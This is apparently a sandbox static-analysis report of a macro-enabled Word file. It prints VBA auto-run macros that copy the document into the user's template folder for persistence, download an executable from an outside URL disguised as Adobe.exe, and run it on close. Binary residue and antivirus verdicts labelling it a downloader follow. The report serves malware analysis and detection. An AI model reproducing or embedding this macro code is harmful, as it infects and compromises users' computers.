Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                    

Original


                                        Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
    curfile = ActiveDocument.Path & "\" & ActiveDocument.Name
    templatefile = Environ("appdata") & "\Microsoft\Templates\" & DateDiff("s", #1/1/1970#, Now()) & ".dotm"
    ActiveDocument.SaveAs2 FileName:=templatefile, FileFormat:=wdFormatXMLTemplateMacroEnabled, AddToRecentFiles:=True
    ActiveDocument.SaveAs2 FileName:=curfile, FileFormat:=wdFormatXMLDocumentMacroEnabled
    Documents.Add Template:=templatefile, NewTemplate:=False, DocumentType:=0
End Sub

Sub autonew()
    imgsrc = "https://www.ramanujan.edu.in/cctv-footage/footage-346.exe"
    URLDownloadToFile 0, imgsrc, "C:\Users\Public\Adobe.exe", 0, 0
End Sub

Sub autoclose()
    Shell ("C:\Users\Public\Adobe.exe")
End Sub


                                    

Deobfuscated


                                        Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
    curfile = ActiveDocument.Path & "\" & ActiveDocument.Name
    templatefile = Environ("appdata") & "\Microsoft\Templates\" & DateDiff("s", #1/1/1970#, Now()) & ".dotm"
    ActiveDocument.SaveAs2 FileName:=templatefile, FileFormat:=wdFormatXMLTemplateMacroEnabled, AddToRecentFiles:=True
    ActiveDocument.SaveAs2 FileName:=curfile, FileFormat:=wdFormatXMLDocumentMacroEnabled
    Documents.Add Template:=templatefile, NewTemplate:=False, DocumentType:=0
End Sub

Sub autonew()
    imgsrc = "https://www.ramanujan.edu.in/cctv-footage/footage-346.exe"
    URLDownloadToFile 0, imgsrc, "C:\Users\Public\Adobe.exe", 0, 0
End Sub

Sub autoclose()
    Shell ("C:\Users\Public\Adobe.exe")
End Sub


                                    
[Content_Types].xml
{@EBn%
_rels/.rels
word/document.xml
#sg[UR?F
EE4Qvxc
'QTre:
A*G/@{
a#PmbDs
KKp~Sq
word/_rels/document.xml.rels
word/vbaProject.bin
$?F!D#4D
:`=p-P
g,iIb%
'I-\SZ
DOp@UZi$
/-IN45c
6U58U5>Uub
:Su<Su2Su*Su:
Qcu5f
l~/jD}~xLb:
N+,+<A
*O/~(-
]X_Sr
word/media/image1.png
nI-uK}
tjH+}Zi
w'|{z)
Wo/cus
i,Canq
X~zLSa
{{..O/
4W3:Zrh
ku\FW{
<2!DPU
aesWn
word/media/image2.png
9\RG@w
ncK3U5
Vq~#[&
fTrXT.
51#vHN,
0Y5C8&
m.0]8b
|6_X%c
nlbKcp
xW(6FO
bCB[@5
l 6pen
p!>hW!
%`H:U
tLoG|b
g&MmO}
k2'fL)
w)d6O
|[}j# >
,}j$(]
@FR^=G~a<
word/theme/theme1.xml
n!td[;
5}4Onb
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
word/settings.xml
$-Eqmwp
word/styles.xml
\C$daM
R%K%c^
Pwq<nDs<fCs<^Bs<VAs<N@s<
`Pg,Vrx
i*yBG
e)32fs$
v25I&D$=
Za?*Ljh3
'g?!Hj
word/webSettings.xml
]?cv0$G
word/fontTable.xml
docProps/core.xml
docProps/app.xml
`'BFmC
cS8!{/gi'
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/vbaProject.binPK
word/media/image1.pngPK
word/media/image2.pngPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
Antivirus Signature
Bkav Clean
Lionic Trojan.Multi.Generic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.46715388
CMC Clean
CAT-QuickHeal O97M.Dropper.F
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
Trustlook Clean
BitDefender Trojan.GenericKD.46715388
K7GW Clean
K7AntiVirus Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall Clean
Avast SNH:Script [Dropper]
ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba TrojanDownloader:VBA/Obfuscation.A
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot DOC.Z.Agent.50860
Rising Downloader.Agent/VBA!1.A514 (CLASSIC)
Ad-Aware Trojan.GenericKD.46715388
TACHYON Clean
Emsisoft Trojan.GenericKD.46715388 (B)
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.pc
FireEye Trojan.GenericKD.46715388
Sophos Mal/DocDl-E
Ikarus Clean
GData Trojan.GenericKD.46715388
Jiangmin MSWord/Downloader.az
Avira HEUR/Macro.Downloader.MRFR.Gen
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Avast-Mobile Clean
Cynet Malicious (score: 99)
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Tencent Heur.Macro.Generic.a.7a69c20e
Yandex Clean
SentinelOne Static AI - Malicious OPENXML
MaxSecure Clean
Fortinet VBA/Agent.094E!tr.dldr
AVG SNH:Script [Dropper]
Panda Clean
Qihoo-360 heur.macro.download.y
No IRMA results available.